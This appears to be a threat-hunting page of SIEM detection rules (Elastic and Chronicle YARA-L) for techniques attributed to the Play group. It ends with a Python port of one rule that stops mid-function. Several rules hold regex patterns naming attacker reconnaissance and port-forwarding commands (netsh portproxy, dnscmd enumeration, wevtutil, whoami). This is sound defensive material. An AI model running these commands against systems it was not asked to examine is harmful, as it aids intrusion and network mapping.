
Hunt pack: Play

990 vendor-native detections · ready to paste into your SIEM · cross-linked to ATT&CK
Vendor-native detections covering the ATT&CK techniques attributed to Play - a ready-to-deploy hunt pack across Splunk, Elastic and Sentinel.

Detections

50 shown of 990
Elastic Original KQL medium T1078 ↗
Suspicious Activity Reported by Okta User
Detects when a user reports suspicious activity for their Okta account. These events should be investigated, as they can help security teams identify when an adversary is attempting to gain access to their network.
Elastic Original EQL medium T1059 ↗
Unusual Parent Process for cmd.exe
Identifies a suspicious parent-child process relationship in which cmd.exe descends from an unusual parent process.
Elastic Original EQL medium T1068 ↗
Unusual Print Spooler Child Process
Detects unusual Print Spooler service (spoolsv.exe) child processes. This may indicate an attempt to exploit privilege escalation vulnerabilities related to the Printing Service on Windows.
Chronicle (YARA-L) Original YARA-L Low T1078 ↗
aws_console_login_without_mfa
Detect when a user logs into AWS console without MFA.
rule aws_console_login_without_mfa {

    meta:
      author = "Google Cloud Security"
      description = "Detect when a user logs into AWS console without MFA."
      rule_id = "mr_b03d1e57-7ed0-49e7-b125-6c18b364ae8c"
      rule_name = "AWS Console Login Without MFA"
      mitre_attack_tactic = "Initial Access"
      mitre_attack_technique = "Valid Accounts: Cloud Accounts"
      mitre_attack_url = "https://attack.mitre.org/techniques/T1078/004/"
      mitre_attack_version = "v13.1"
      type = "Alert"
      data_source = "AWS CloudTrail"
      platform = "AWS"
      severity = "Low"
      priority = "Low"

    events:

      $login.metadata.vendor_name = "AMAZON"
      $login.metadata.product_name = "AWS CloudTrail"
      $login.metadata.event_type = "USER_LOGIN"
      $login.metadata.product_event_type = "ConsoleLogin"
      $login.security_result.action = "ALLOW"
      $login.extensions.auth.auth_details = "MFAUsed: No"
      $login.additional.fields["recipientAccountId"] = $account_id

    match:
      $account_id over 1h

    outcome:
      $risk_score = max(
        //Baseline
        35 +
        if($login.principal.resource.type = "Root", 50)
      )
      $mitre_attack_tactic = "Initial Access"
      $mitre_attack_technique = "Valid Accounts: Cloud Accounts"
      $mitre_attack_technique_id = "T1078.004"
      $event_count = count_distinct($login.metadata.id)
      $network_http_user_agent = array_distinct($login.network.http.user_agent)
      $principal_ip = array_distinct($login.principal.ip)
      $principal_ip_country = array_distinct($login.principal.ip_geo_artifact.location.country_or_region)
      $principal_ip_state = array_distinct($login.principal.ip_geo_artifact.location.state)
      $target_user_display_name = array_distinct($login.target.user.user_display_name)
      $target_user_userid = array_distinct($login.target.user.userid)
      $is_mfa_used = array_distinct($login.extensions.auth.auth_details)
      $target_resource_name = array_distinct($login.target.resource.name)
      $target_resource_product_object_id = array_distinct($login.target.resource.product_object_id)

    condition:
      $login
}
Chronicle (YARA-L) Original YARA-L Low T1078.004 ↗
entra_id_login_activity_to_uncommon_mscloud_apps
This rule detects Azure AD login activity to apps other than a defined list of first-party MS Cloud Apps. Note that Azure Active Directory PowerShell and custom Azure apps are not in this list by default.
rule entra_id_login_activity_to_uncommon_mscloud_apps {

  meta:
    author = "Google Cloud Security"
    description = "This rule detects Azure AD login activity to apps other than a defined list of first party MS Cloud Apps. Note that Azure Active Directory PowerShell and custom Azure apps are not in this list by default"
    assumption = "The list first_party_ms_cloud_apps is populated and tuned as needed"
    rule_id = "mr_1a39c017-9045-48d4-928d-096511edf3cc"
    rule_name = "Entra ID Login Activity to Uncommon MS Cloud Apps"
    tactic = "TA0001"
    technique = "T1078.004"
    reference = "https://learn.microsoft.com/en-us/troubleshoot/azure/active-directory/verify-first-party-apps-sign-in"
    type = "alert"
    platform = "azure"
    data_source = "azure ad"
    severity = "Low"
    priority = "Low"

  events:
    $login.metadata.event_type = "USER_LOGIN"
    $login.metadata.product_name = "Azure AD"
    $login.metadata.vendor_name = "Microsoft"
    $login.security_result.action = "ALLOW"
    not $login.target.resource.attribute.labels["App Id"] in %first_party_ms_cloud_apps

    // Below is to filter ADFS Sync Account that runs every 30 minutes between AD and Azure; can use userid or email address
    //$login.target.user.userid = "insert your userid here"
    $login.target.user.user_display_name != "On-Premises Directory Synchronization Service Account"

    $login.target.user.userid = $userid

  match:
    $userid over 5m

  outcome:
    $risk_score = 35
    $event_count = count_distinct($login.metadata.id)
    $target_application = array_distinct($login.target.application)
    $target_application_guid = array_distinct($login.target.resource.attribute.labels["App Id"])
    $security_description = array_distinct($login.security_result.description)
    $security_summary = array_distinct($login.security_result.summary)
    $country_region_login_attempt = array_distinct(strings.concat($login.principal.location.city," ",$login.principal.location.state," ",$login.principal.location.country_or_region))
    //Used for match condition, don't need as outcome variable as well
    //$target_user_userid = array_distinct($login.target.user.userid)

  condition:
    $login
}
Chronicle (YARA-L) Original YARA-L Low T1098 ↗
gcp_admin_privileged_roles_added_to_service_accounts
Detect when admin privileged roles such as Owner or Editor are added to a Service Account.
rule gcp_admin_privileged_roles_added_to_service_accounts {

  meta:
    author = "Google Cloud Security"
    description = "Detect when admin privileged roles such as Owner or Editor are added to a Service Account."
    rule_id = "mr_9ffebc73-6d73-40bd-8973-2d53a810272f"
    rule_name = "GCP Admin Privileged Roles Added To Service Accounts"
    mitre_attack_tactic = "Persistence, Privilege Escalation"
    mitre_attack_technique = "Account Manipulation: Additional Cloud Roles"
    mitre_attack_url = "https://attack.mitre.org/techniques/T1098/003/"
    mitre_attack_version = "v14.1"
    type = "Alert"
    data_source = "GCP Cloud Audit"
    platform = "GCP"
    severity = "Low"
    priority = "Low"

  events:
    $gcp.metadata.event_type = "USER_RESOURCE_UPDATE_PERMISSIONS"
    $gcp.metadata.log_type = "GCP_CLOUDAUDIT"
    $gcp.metadata.product_event_type = "SetIamPolicy"
    $gcp.security_result.action = "ALLOW"
    $gcp.target.resource.attribute.labels["ser_binding_deltas_action"] = "ADD"
    $gcp.target.resource.attribute.labels["ser_binding_deltas_role"] = /roles\/owner.*|roles\/editor.*/ nocase
    $gcp.target.resource.attribute.labels["ser_binding_deltas_member"] = /^serviceAccount/ nocase

  outcome:
    $risk_score = max(35)
    $mitre_attack_tactic = "Persistence, Privilege Escalation"
    $mitre_attack_technique = "Account Manipulation: Additional Cloud Roles"
    $mitre_attack_technique_id = "T1098.003"
    $event_count = count_distinct($gcp.metadata.id)
    $network_http_user_agent = array_distinct($gcp.network.http.user_agent)
    $principal_ip = array_distinct($gcp.principal.ip)
    $principal_ip_country = array_distinct($gcp.principal.ip_geo_artifact.location.country_or_region)
    $principal_ip_state = array_distinct($gcp.principal.ip_geo_artifact.location.state)
    $principal_user_id = $gcp.principal.user.userid
    $principal_user_display_name = $gcp.principal.user.user_display_name
    $target_resource_name = $gcp.target.resource.name
    $event_name = $gcp.metadata.product_event_type
    $target_email_addresses = array_distinct($gcp.target.user.email_addresses)

  condition:
    $gcp
}
Chronicle (YARA-L) Original YARA-L Low T1098 ↗
google_workspace_password_policy_changed
Identifies when Google Workspace password policy is changed. Security teams can monitor for changes to password policy configuration that may weaken the organization's security posture.
rule google_workspace_password_policy_changed {

  meta:
    author = "Google Cloud Security"
    description = "Identifies when Google Workspace password policy is changed. Security teams can monitor for changes to password policy configuration that may weaken the organization's security posture."
    rule_id = "mr_fd63a810-800a-4c55-97d2-080fc8a0e567"
    rule_name = "Google Workspace Password Policy Changed"
    mitre_attack_tactic = "Persistence"
    mitre_attack_technique = "Account Manipulation"
    mitre_attack_url = "https://attack.mitre.org/techniques/T1098/"
    mitre_attack_version = "v13.1"
    type = "Alert"
    data_source = "Workspace Activity"
    severity = "Low"
    priority = "Low"

  events:
    $ws.metadata.vendor_name = "Google Workspace"
    $ws.metadata.product_name = "admin"
    ($ws.metadata.product_event_type = "CREATE_APPLICATION_SETTING" or
    $ws.metadata.product_event_type = "CHANGE_APPLICATION_SETTING")
    $ws.security_result.category_details = "APPLICATION_SETTINGS"
    $ws.target.resource.name = /Password Management/
    $ws.principal.user.email_addresses = $email

  match:
    $email over 1h

  outcome:
    $risk_score = max(35)
    $mitre_attack_tactic = "Persistence"
    $mitre_attack_technique = "Account Manipulation"
    $mitre_attack_technique_id = "T1098"
    $event_count = count_distinct($ws.metadata.id)
    $principal_ip = array_distinct($ws.principal.ip)
    $principal_country = array_distinct($ws.principal.ip_geo_artifact.location.country_or_region)
    $principal_state = array_distinct($ws.principal.ip_geo_artifact.location.state)
    $principal_user_emails = array_distinct($ws.principal.user.email_addresses)
    $principal_user_id = array_distinct($ws.principal.user.userid)
    $target_application = array_distinct($ws.target.application)
    $password_policies = array_distinct($ws.target.resource.name)

  condition:
    $ws
}
Chronicle (YARA-L) Original YARA-L Low T1033 ↗
local_accounts_discovery
Local account and System Owner/User discovery using operating system utilities.
rule local_accounts_discovery {

  meta:
    author = "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community"
    description = "Local accounts, System Owner/User discovery using operating systems utilities"
    reference = "https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_local_system_owner_account_discovery.yml"
    license = "https://github.com/SigmaHQ/Detection-Rule-License/blob/main/LICENSE.Detection.Rules.md"
    rule_name = "Local Accounts Discovery"
    sigma_uuid = "502b42de-4306-40b4-9596-6f590c81f073"
    sigma_status = "test"
    rule_id = "mr_3a6b5c72-8126-4f43-a4ac-9c8bbac7fa72"
    tactic = "TA0007"
    technique = "T1033"
    type = "Detection"
    data_source = "Sysmon"
    platform = "Windows"
    severity = "Low"
    priority = "Low"
    false_positives = "Legitimate administrator or user enumerates local users for legitimate reason"

  events:
    $process.metadata.event_type = "PROCESS_LAUNCH"
    (
      (
        re.regex($process.target.process.file.full_path, `\\cmd\.exe$`) nocase and
        strings.contains(strings.to_lower($process.target.process.command_line), " /c") and
        strings.contains(strings.to_lower($process.target.process.command_line), "dir ") and
        strings.contains(strings.to_lower($process.target.process.command_line), "\\users\\") and
        NOT strings.contains(strings.to_lower($process.target.process.command_line), " rmdir ")
      )
      or
      (
        // net.exe / net1.exe are grouped so the command-line filters below apply to both;
        // without the parentheses, "and" binds tighter than "or" and a bare net.exe launch would match
        (
          re.regex($process.target.process.file.full_path, `\\net\.exe$`) nocase or
          re.regex($process.target.process.file.full_path, `\\net1\.exe$`) nocase
        ) and
        strings.contains(strings.to_lower($process.target.process.command_line), "user") and
        NOT strings.contains(strings.to_lower($process.target.process.command_line), "/domain") and
        NOT strings.contains(strings.to_lower($process.target.process.command_line), "/add") and
        NOT strings.contains(strings.to_lower($process.target.process.command_line), "/delete") and
        NOT strings.contains(strings.to_lower($process.target.process.command_line), "/active") and
        NOT strings.contains(strings.to_lower($process.target.process.command_line), "/expires") and
        NOT strings.contains(strings.to_lower($process.target.process.command_line), "/passwordreq") and
        NOT strings.contains(strings.to_lower($process.target.process.command_line), "/scriptpath") and
        NOT strings.contains(strings.to_lower($process.target.process.command_line), "/times") and
        NOT strings.contains(strings.to_lower($process.target.process.command_line), "/workstations")
      )
      or
      (
        re.regex($process.target.process.file.full_path, `\\whoami\.exe$`) nocase or
        re.regex($process.target.process.file.full_path, `\\quser\.exe$`) nocase or
        re.regex($process.target.process.file.full_path, `\\qwinsta\.exe$`) nocase or
        (
          re.regex($process.target.process.file.full_path, `\\wmic\.exe$`) nocase and
          strings.contains(strings.to_lower($process.target.process.command_line), "useraccount") and
          strings.contains(strings.to_lower($process.target.process.command_line), "get")
        ) or
        (
          re.regex($process.target.process.file.full_path, `\\cmdkey\.exe$`) nocase and
          strings.contains(strings.to_lower($process.target.process.command_line), " /l")
        )
      )
    )
    $process.principal.hostname = $hostname

  match:
    $hostname over 5m

  outcome:
    //example usage of specifying test user and hostname to adjust risk score
    $risk_score = max(if($process.principal.user.userid = "user" and $process.principal.hostname = "hostname", 0, 15))
    $principal_process_pid = array_distinct($process.principal.process.pid)
    $principal_process_command_line = array_distinct($process.principal.process.command_line)
    $principal_process_file_sha256 = array_distinct($process.principal.process.file.sha256)
    $principal_process_file_full_path = array_distinct($process.principal.process.file.full_path)
    $principal_process_product_specific_process_id = array_distinct($process.principal.process.product_specific_process_id)
    $principal_process_parent_process_product_specific_process_id = array_distinct($process.principal.process.parent_process.product_specific_process_id)
    $target_process_pid = array_distinct($process.target.process.pid)
    $target_process_command_line = array_distinct($process.target.process.command_line)
    $target_process_file_sha256 = array_distinct($process.target.process.file.sha256)
    $target_process_file_full_path = array_distinct($process.target.process.file.full_path)
    $target_process_product_specific_process_id = array_distinct($process.target.process.product_specific_process_id)
    $principal_user_userid = array_distinct($process.principal.user.userid)
    $log_type = array_distinct(strings.concat($process.metadata.log_type,"/",$process.metadata.product_event_type))

  condition:
    $process
}
Chronicle (YARA-L) Original YARA-L Low T1078 ↗
okta_user_login_out_of_hours
Detects out of hours successful authentication.
rule okta_user_login_out_of_hours {

  meta:
    author = "Google Cloud Security"
    description = "Detects out of hours successful authentication."
    rule_id = "mr_36840037-a41c-47d0-b0eb-4096f28855e1"
    rule_name = "Okta User Login Out Of Hours"
    reference = "https://support.okta.com/help/s/article/User-Signin-and-Recovery-Events-in-the-Okta-System-Log"
    mitre_attack_tactic = "Defense Evasion, Persistence, Privilege Escalation, Initial Access"
    mitre_attack_technique = "Valid Accounts"
    mitre_attack_url = "https://attack.mitre.org/techniques/T1078/"
    mitre_attack_version = "v13.1"
    type = "Alert"
    data_source = "Okta"
    severity = "Low"
    priority = "Low"

  events:
    $login.metadata.product_name = "Okta"
    $login.metadata.vendor_name = "Okta"
    $login.metadata.event_type = "USER_LOGIN"
    $login.target.user.email_addresses = $user
    $login.security_result.action = "ALLOW"
    $login.metadata.event_timestamp.seconds = $timestamp

    (
        01 = timestamp.get_day_of_week($timestamp, "UTC") or //Sunday
        07 = timestamp.get_day_of_week($timestamp, "UTC")  //Saturday
    )

  match:
    $user over 1h

  outcome:
    $risk_score = max(
        if (01 = timestamp.get_day_of_week($timestamp, "UTC"), 10) +
        if (07 = timestamp.get_day_of_week($timestamp, "UTC"), 15) +
        if ( ( timestamp.get_hour($timestamp, "UTC") >= 0 and timestamp.get_hour($timestamp,"UTC")<= 7) or timestamp.get_hour($timestamp,"UTC") > 20, 50)
    )
    $mitre_attack_tactic = "Defense Evasion, Persistence, Privilege Escalation, Initial Access"
    $mitre_attack_technique = "Valid Accounts"
    $principal_ip = array_distinct($login.principal.ip)
    $principal_ip_country = array_distinct($login.principal.ip_geo_artifact.location.country_or_region)
    $principal_ip_state = array_distinct($login.principal.ip_geo_artifact.location.state)
    $principal_ip_city = array_distinct($login.principal.location.city)
    $security_result_summary = array_distinct($login.security_result.summary)
    $principal_user_managers_email_addresses = array_distinct($login.principal.user.managers.email_addresses)
    $principal_user_userid = array_distinct($login.principal.user.userid)
    $dc_principal_user_userid = count_distinct($login.principal.user.userid)
    $target_user_email_addresses = array_distinct($login.target.user.email_addresses)
    $target_user_userid = array_distinct($login.target.user.userid)
    $target_user_agent = array_distinct($login.network.http.user_agent)
    $security_result_description = array_distinct($login.security_result.description)

  condition:
    $login
}
Chronicle (YARA-L) Original YARA-L Low T1090 ↗
port_proxy_forwarding_T1090_cisa_report
Detects port forwarding being enabled with the netsh command, and registry settings created or modified in support of portproxy v4tov4.
rule port_proxy_forwarding_T1090_cisa_report {

  meta:
    author = "Google Cloud Security"
    description = "Detects port forwarding being enabled using netsh command and registry settings created or modified in support of portproxy v4tov4"
    rule_id = "mr_4c6f2d66-ed6f-4dda-bd2f-7c545898468b"
    rule_name = "MITRE ATT&CK T1090 Port Proxy Forwarding CISA Report"
    type = "hunt"
    platform = "Windows"
    data_source = "microsoft sysmon, windows event log"
    tactic = "TA0011"
    technique = "T1090"
    reference = "https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF"
    severity = "Low"
    priority = "Low"

  events:
    (
        $process.metadata.event_type = "PROCESS_LAUNCH" and

        // cisa report referenced cmd /c in their report throughout, can filter this in/out for tuning as needed
        re.regex($process.target.process.command_line, `(|cmd.*/c).*netsh.*interface.*portproxy.*add.*v4tov4`) nocase
        // For greater precision to align with the report, comment out the above line and uncomment the below line to incorporate exact ports referenced
        //re.regex($process.target.process.command_line, `(|cmd.*/c).*netsh.*interface.*portproxy.*add.*v4tov4.*port\=(9999|50100).*port\=(8443|1433)`) nocase
    )
    or
    (
        // Looks for the actual registry creation or modification that would accompany portproxy command executing
        (
        $process.metadata.event_type = "REGISTRY_CREATION" or
        $process.metadata.event_type = "REGISTRY_MODIFICATION"
        ) and
        $process.target.registry.registry_key = "HKLM\\System\\CurrentControlSet\\Services\\PortProxy\\v4tov4"
    )

    $process.principal.hostname = $hostname

  match:
    $hostname over 5m

  outcome:
    $risk_score = 35
    $event_count = count_distinct($process.metadata.id)
    // added to populate alert graph with additional context
    // Commented out principal.hostname because it is already represented in graph as match variable. If match changes, can uncomment to add to results
    //$principal_hostname = array_distinct($process.principal.hostname)
    $principal_process_pid = array_distinct($process.principal.process.pid)
    $principal_process_command_line = array_distinct($process.principal.process.command_line)
    $principal_process_file_sha256 = array_distinct($process.principal.process.file.sha256)
    $principal_process_file_full_path = array_distinct($process.principal.process.file.full_path)
    $principal_process_product_specific_process_id = array_distinct($process.principal.process.product_specific_process_id)
    $principal_process_parent_process_product_specific_process_id = array_distinct($process.principal.process.parent_process.product_specific_process_id)
    $target_process_pid = array_distinct($process.target.process.pid)
    $target_process_command_line = array_distinct($process.target.process.command_line)
    $target_process_file_sha256 = array_distinct($process.target.process.file.sha256)
    $target_process_file_full_path = array_distinct($process.target.process.file.full_path)
    $target_process_product_specific_process_id = array_distinct($process.target.process.product_specific_process_id)
    $principal_user_userid = array_distinct($process.principal.user.userid)

  condition:
    $process
}
Chronicle (YARA-L) Original YARA-L Low T1016 ↗
recon_environment_enumeration_network_cisa_report
Detects network enumeration commands as identified in the CISA Living off the Land PDF. Alone they may be normal, but in concert they may be worth looking into.
rule recon_environment_enumeration_network_cisa_report {

  meta:
    author = "Google Cloud Security"
    description = "Detects network enumeration commands as identified in CISA Living off the Land pdf. Alone they may be normal but in concert, they may be worth looking into"
    rule_id = "mr_9ca49a46-fb60-4ada-b722-5714d5cb7f53"
    rule_name = "Recon Environment Enumeration Network CISA Report"
    type = "hunt"
    platform = "Windows"
    data_source = "microsoft sysmon, windows event logs"
    tactic = "TA0007"
    technique = "T1016"
    reference = "https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF"
    severity = "Low"
    priority = "Low"

  events:
    (
        $process.metadata.event_type = "PROCESS_LAUNCH" and
        (
            // cisa report referenced cmd /c in their report throughout, can filter this in/out for tuning as needed
            re.regex($process.target.process.command_line, `(|cmd.*/c).*arp.*-a`) nocase or
            re.regex($process.target.process.command_line, `(|cmd.*/c).*curl.*www.ip-api.com`) nocase or
            // the following line is a broader look at dnscmd /enumrecords not explicitly called out in the report can comment out if not needed
            //re.regex($process.target.process.command_line, `(|cmd.*/c).*dnscmd.*/enumrecords`) nocase or
            re.regex($process.target.process.command_line, `(|cmd.*/c).*dnscmd.*/enumrecords.*/zone`) nocase or
            re.regex($process.target.process.command_line, `(|cmd.*/c).*dnscmd.*/enumzones`) nocase or
            re.regex($process.target.process.command_line, `(|cmd.*/c).*dnscmd.*/enumrecords.*/additional`) nocase or
            re.regex($process.target.process.command_line, `(|cmd.*/c).*ipconfig.*/all`) nocase or
            re.regex($process.target.process.command_line, `(|cmd.*/c).*netsh.*interface.*firewall.*show`) nocase or
            re.regex($process.target.process.command_line, `(|cmd.*/c).*netsh.*interface.*portproxy.*show`) nocase or
            re.regex($process.target.process.command_line, `(|cmd.*/c).*netsh.*interface.*portproxy.*show.*v4tov4`) nocase or
            re.regex($process.target.process.command_line, `(|cmd.*/c).*netsh.*firewall.*show`) nocase or
            re.regex($process.target.process.command_line, `(|cmd.*/c).*netsh.*portproxy.*show.*v4tov4`) nocase or
            re.regex($process.target.process.command_line, `(|cmd.*/c).*netstat.*-ano`) nocase
        )
    )
    or
        (
            // C2 like Covenant will mask curl command running from PowerShell; added this to detect DNS lookup for this site as another method to identify
            $process.metadata.event_type = "NETWORK_DNS" and
            $process.network.application_protocol = "DNS" and
            $process.network.dns.questions.name = "www.ip-api.com"
        )

    $process.principal.hostname = $hostname
    $process.target.process.command_line = $command_line

  match:
    $hostname over 15m

  outcome:
    $risk_score = 35
    $event_count = count_distinct($process.metadata.id)
    $unique_command_line_threshold = 5
    // added to populate alert graph with additional context
    // Commented out principal.hostname because it is already represented in graph as match variable. If match changes, can uncomment to add to results
    //$principal_hostname = array_distinct($process.principal.hostname)
    $principal_process_pid = array_distinct($process.principal.process.pid)
    $principal_process_command_line = array_distinct($process.principal.process.command_line)
    $principal_process_file_sha256 = array_distinct($process.principal.process.file.sha256)
    $principal_process_file_full_path = array_distinct($process.principal.process.file.full_path)
    $principal_process_product_specific_process_id = array_distinct($process.principal.process.product_specific_process_id)
    $principal_process_parent_process_product_specific_process_id = array_distinct($process.principal.process.parent_process.product_specific_process_id)
    $target_process_pid = array_distinct($process.target.process.pid)
    $target_process_command_line = array_distinct($process.target.process.command_line)
    $target_process_file_sha256 = array_distinct($process.target.process.file.sha256)
    $target_process_file_full_path = array_distinct($process.target.process.file.full_path)
    $target_process_product_specific_process_id = array_distinct($process.target.process.product_specific_process_id)
    $principal_user_userid = array_distinct($process.principal.user.userid)

  condition:
    // modify the condition value for command line to throttle how many of these commands can be issued until the rule is triggered
    $process and #command_line > 5
}
Chronicle (YARA-L) Original YARA-L Low T1082 ↗
recon_environment_enumeration_system_cisa_report
Detects system enumeration events as identified in the CISA Living off the Land PDF. Alone they may be normal, but in concert they may be worth looking into.
rule recon_environment_enumeration_system_cisa_report {

  meta:
    author = "Google Cloud Security"
    description = "Detects system enumeration events as identified in CISA Living off the Land pdf. Alone they may be normal but in concert, they may be worth looking into"
    rule_id = "mr_086dede6-33ba-42df-b001-5595ceb0d589"
    rule_name = "Recon Environment Enumeration System CISA Report"
    type = "hunt"
    platform = "Windows"
    data_source = "microsoft sysmon, windows event logs"
    tactic = "TA0007"
    technique = "T1082"
    reference = "https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF"
    severity = "Low"
    priority = "Low"

  events:
    $process.metadata.event_type = "PROCESS_LAUNCH"
    $process.principal.hostname = $hostname
    $process.target.process.command_line = $command_line

    re.regex($process.target.process.command_line, `wevtutil.*qe.*security.*\/rd:true.*\/f:text.*\/q:.*\[System\[\(EventID`) nocase
    // below is the more specific command down to the event id; comment out the line above and use this instead if desired
    //re.regex($process.target.process.command_line, `wevtutil.*qe.*security.*\/rd:true.*\/f:text.*\/q:\*\[System\[\(EventID=4624\).*TimeCreated\[@SystemTime.*\]\].*EventData\[Data.*\]\]`) nocase

    or

    // cisa report referenced cmd /c in their report throughout, can filter this in/out for tuning as desired
    // other wmic switches like /user and /password have been excluded to focus on the commands being issued, since local access does not require them
    (
        re.regex($process.target.process.command_line, `(|cmd.*/c).*ldifde.exe.*-f.*-p.*subtree`) nocase or
        re.regex($process.target.process.command_line, `(|cmd.*/c).*reg.*query.*hklm\\software\\`) nocase or
        re.regex($process.target.process.command_line, `(|cmd.*/c).*systeminfo`) nocase or
        re.regex($process.target.process.command_line, `(|cmd.*/c).*tasklist.*\/v`) nocase or
        re.regex($process.target.process.command_line, `(|cmd.*/c).*whoami`) nocase or
        re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*volume.*list.*brief`) nocase or
        // cisa report called out wmic volume list brief, below is alternate that removed brief to widen criteria
        //re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*volume.*list`) nocase or
        re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*service.*brief`) nocase or
        re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*product.*list.*brief`) nocase or
        re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*baseboard.*list.*full`) nocase or
        re.regex($process.target.process.command_line, `(|cmd.*/c).*wmic.*path.*win32_logicaldisk.*get.*(caption|filesystem|freespace|size|volumename)`) nocase
    )

  match:
    $hostname over 15m

  outcome:
    $risk_score = 35
    $event_count = count_distinct($process.metadata.id)
    $unique_command_line_threshold = max(5)
    // added to populate alert graph with additional context
    // Commented out principal.hostname because it is already represented in graph as match variable. If match changes, can uncomment to add to results
    //$principal_hostname = array_distinct($process.principal.hostname)
    $principal_process_pid = array_distinct($process.principal.process.pid)
    $principal_process_command_line = array_distinct($process.principal.process.command_line)
    $principal_process_file_sha256 = array_distinct($process.principal.process.file.sha256)
    $principal_process_file_full_path = array_distinct($process.principal.process.file.full_path)
    $principal_process_product_specific_process_id = array_distinct($process.principal.process.product_specific_process_id)
    $principal_process_parent_process_product_specific_process_id = array_distinct($process.principal.process.parent_process.product_specific_process_id)
    $target_process_pid = array_distinct($process.target.process.pid)
    $target_process_command_line = array_distinct($process.target.process.command_line)
    $target_process_file_sha256 = array_distinct($process.target.process.file.sha256)
    $target_process_file_full_path = array_distinct($process.target.process.file.full_path)
    $target_process_product_specific_process_id = array_distinct($process.target.process.product_specific_process_id)
    $principal_user_userid = array_distinct($process.principal.user.userid)

  condition:
    // modify the condition value for command line to throttle how many of these commands can be issued until the rule is triggered
    $process and #command_line > 5
}
Chronicle (YARA-L) Original YARA-L Low T1078 ↗
sap_break_glass_account_login
Alerts whenever a default SAP administrative account (e.g., SAP*, DDIC, TMSADM) logs into the system. These accounts should be locked and used only for emergency 'break-glass' scenarios.
Show query
rule sap_break_glass_account_login {

  meta:
    author = "Google Cloud Security"
    description = "Alerts whenever a default SAP administrative account (e.g., SAP*, DDIC, TMSADM) logs into the system. These accounts should be locked and used only for emergency 'break-glass' scenarios"
    severity = "Low"
    tactic = "TA0001"
    technique = "T1078"

  events:
    $e.metadata.log_type = "SAP_SECURITY_AUDIT"
    (
        $e.additional.fields["msg_1"] = /^AU1$|^AU5$/ or
        $e.metadata.event_type = "USER_LOGIN"
    )
    $e.principal.user.userid = $userid
    $userid = /^DDIC$|^EARLYWATCH$|^SAP\*$|^TMSADM$/ nocase

  match:
    $userid over 1h

  outcome:
    $event_count = count_distinct($e.metadata.id)
    $risk_score = if($event_count < 10, 20, 40)
    $vendor_name = array_distinct($e.metadata.vendor_name)
    $product_name = array_distinct($e.metadata.product_name)
    $product_severity = array_distinct($e.security_result.severity)
    $event_description = array_distinct($e.metadata.description)
    $victim_name = array_distinct($e.target.user.userid)
    $adversary_name = array_distinct($e.principal.user.userid)
    $result_time = min($e.metadata.event_timestamp.seconds)

  condition:
    $e
}
Chronicle (YARA-L) Original YARA-L Low T1190 ↗
sap_gateway_acl_bypass_attempt
Detects rejected connections by Gateway ACLs (secinfo/reginfo), indicating an attempt to bypass network-layer security.
Show query
rule sap_gateway_acl_bypass_attempt {

  meta:
    author = "Google Cloud Security"
    description = "Detects rejected connections by Gateway ACLs (secinfo/reginfo), indicating an attempt to bypass network-layer security."
    severity = "Low"
    tactic = "TA0001"
    technique = "T1190"

  events:
    $e.metadata.product_name = "SAP_GATEWAY"

    $e.additional.fields["event_action"] = /secinfo|reginfo/ nocase

    $e.security_result.action = "BLOCK"

    $source_ip = $e.principal.ip

  match:
    $source_ip over 30m

  outcome:
    $risk_score = 5
    $acl_type = array_distinct($e.additional.fields["event_action"])
    $attempted_programs = array_distinct($e.target.process.file.full_path)
    $error_details = array_distinct($e.security_result.description)
    $user_context = array_distinct($e.principal.user.userid)
    $total_denials = count($e.metadata.product_log_id)

  condition:
    $e
}
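The `match: $source_ip over 30m` and `outcome:` sections of the rule above are what turn individual ACL denials into one grouped detection per source address, and the same mechanics (`match ... over`, `array_distinct`, `count`) appear in most of the Chronicle rules in this pack. The Python below is an added example, not part of the hunt pack or of Google's rule set, that reproduces that grouping over a few constructed gateway events so the logic can be ported to a SIEM without native YARA-L windows. The event shape (`ts`, `product_name`, `event_action`, `action`, `ip`, `program`, `user`) is an assumed flattening of the UDM fields the rule reads, and the window is a simplified session window (a new window starts when an event lands more than 30 minutes after the first event of the current one) rather than Chronicle's exact hopping-window semantics.

```python
"""Added example (not part of the hunt pack): group SAP Gateway ACL denials
by source IP in a 30-minute window and build the same outcome fields the
YARA-L rule emits. Field names are an assumed flattening of the UDM fields."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)
# rule: $e.additional.fields["event_action"] = /secinfo|reginfo/ nocase
ACL_RE = re.compile(r"secinfo|reginfo", re.IGNORECASE)

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T10:00:00", "product_name": "SAP_GATEWAY", "event_action": "secinfo",
     "action": "BLOCK", "ip": "10.1.1.5", "program": "/usr/sap/bin/rfcexec", "user": "RFCUSER"},
    {"ts": "2024-05-01T10:05:00", "product_name": "SAP_GATEWAY", "event_action": "reginfo",
     "action": "BLOCK", "ip": "10.1.1.5", "program": "sapxpg", "user": ""},
    {"ts": "2024-05-01T10:10:00", "product_name": "SAP_GATEWAY", "event_action": "secinfo",
     "action": "ALLOW", "ip": "10.1.1.5", "program": "/usr/sap/bin/rfcexec", "user": "RFCUSER"},
    {"ts": "2024-05-01T10:50:00", "product_name": "SAP_GATEWAY", "event_action": "secinfo",
     "action": "BLOCK", "ip": "10.1.1.5", "program": "/bin/sh", "user": "RFCUSER"},
    {"ts": "2024-05-01T10:03:00", "product_name": "SAP_GATEWAY", "event_action": "REGINFO",
     "action": "BLOCK", "ip": "10.2.2.9", "program": "sapxpg", "user": ""},
    {"ts": "2024-05-01T10:04:00", "product_name": "SAP_SECURITY_AUDIT", "event_action": "secinfo",
     "action": "BLOCK", "ip": "10.2.2.9", "program": "sapxpg", "user": ""},
]


def matches_event_filter(event):
    """The rule's `events:` section: gateway product, secinfo/reginfo ACL, blocked."""
    return (event["product_name"] == "SAP_GATEWAY"
            and ACL_RE.search(event["event_action"]) is not None
            and event["action"] == "BLOCK")


def outcome(source_ip, events):
    """The rule's `outcome:` section for one window of events."""
    return {
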